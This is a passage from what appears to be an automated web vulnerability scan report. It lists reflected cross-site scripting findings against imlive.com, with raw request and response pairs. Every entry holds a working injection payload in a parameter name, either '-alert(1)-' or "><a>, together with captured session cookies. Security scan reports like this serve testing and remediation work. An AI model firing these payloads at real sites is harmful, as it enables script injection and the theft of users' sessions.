ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:37 GMT
Connection: close
Content-Length: 32369
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hotfeatures.aspx&he=imlive.com&ul=/live-sex-chats/sex-video-features/?80442'-alert(1)-'ebd4ed614b9=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

2.116. http://imlive.com/live-sex-chats/sex-video-features/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/sex-video-features/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2028a"><a>c334382ea0e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/sex-video-features/?2028a"><a>c334382ea0e=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:29 GMT
Connection: close
Content-Length: 32222
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/sex-video-features/?2028a"><a>c334382ea0e=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.117. http://imlive.com/live-sex-chats/shemale-couple/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/shemale-couple/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f758'-alert(1)-'be71a5fa912 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/shemale-couple/?9f758'-alert(1)-'be71a5fa912=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:06 GMT
Connection: close
Content-Length: 92716
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/shemale-couple/?9f758'-alert(1)-'be71a5fa912=1&qs=cat=1^roomid=557^9f758'-alert(1)-'be71a5fa912=1&qs=cat=1^roomid=557^9f758'-alert(1)-'be71a5fa912=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63
...[SNIP]...

2.118. http://imlive.com/live-sex-chats/shemale-couple/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/shemale-couple/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52e5c"><a>069e897b555 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/shemale-couple/?52e5c"><a>069e897b555=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:34 GMT
Connection: close
Content-Length: 92559
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/shemale-couple/?52e5c"><a>069e897b555=1">
...[SNIP]...

2.119. http://imlive.com/live-sex-chats/shemale/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/shemale/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8242"><a>b60847be956 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/shemale/?f8242"><a>b60847be956=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:15 GMT
Connection: close
Content-Length: 224539
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/shemale/?f8242"><a>b60847be956=1">
...[SNIP]...

2.120. http://imlive.com/live-sex-chats/shemale/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/shemale/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7464'-alert(1)-'af09ad182b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/shemale/?b7464'-alert(1)-'af09ad182b3=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:31 GMT
Connection: close
Content-Length: 224765
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/shemale/?b7464'-alert(1)-'af09ad182b3=1&qs=cat=1^roomid=51^b7464'-alert(1)-'af09ad182b3=1&qs=cat=1^roomid=51^b7464'-alert(1)-'af09ad182b3=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb
...[SNIP]...

2.121. http://imlive.com/live-sex-chats/shy-girl/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/shy-girl/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b1a0"><a>61a08cd9cef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/shy-girl/?3b1a0"><a>61a08cd9cef=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:20:23 GMT
Connection: close
Content-Length: 171425
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/shy-girl/?3b1a0"><a>61a08cd9cef=1">
...[SNIP]...

2.122. http://imlive.com/live-sex-chats/shy-girl/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/shy-girl/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df49d'-alert(1)-'469a7a377c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/shy-girl/?df49d'-alert(1)-'469a7a377c8=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:20:40 GMT
Connection: close
Content-Length: 171563
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/shy-girl/?df49d'-alert(1)-'469a7a377c8=1&qs=cat=1^roomid=160^df49d'-alert(1)-'469a7a377c8=1&qs=cat=1^roomid=160^df49d'-alert(1)-'469a7a377c8=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63
...[SNIP]...

2.123. http://imlive.com/liveexperts.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /liveexperts.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 42604'><a>750b6f3eb7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /liveexperts.asp?42604'><a>750b6f3eb7b=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:10 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:10 GMT
Connection: close
Content-Length: 19420
Vary: Accept-Encoding


<html>
   <head>
       <title>live webcam video chat with experts at imlive</title>
       <meta name="description" content="Live video chat sessions with experts in just about anything - Mysticism & Spir
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/liveexperts.asp?42604'><a>750b6f3eb7b=1&lr=1107816009&ud=0&pe=liveexperts.asp&qs=42604'>
...[SNIP]...

2.124. http://imlive.com/localcompanionship.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /localcompanionship.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d9f12'><a>f87a2832891 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

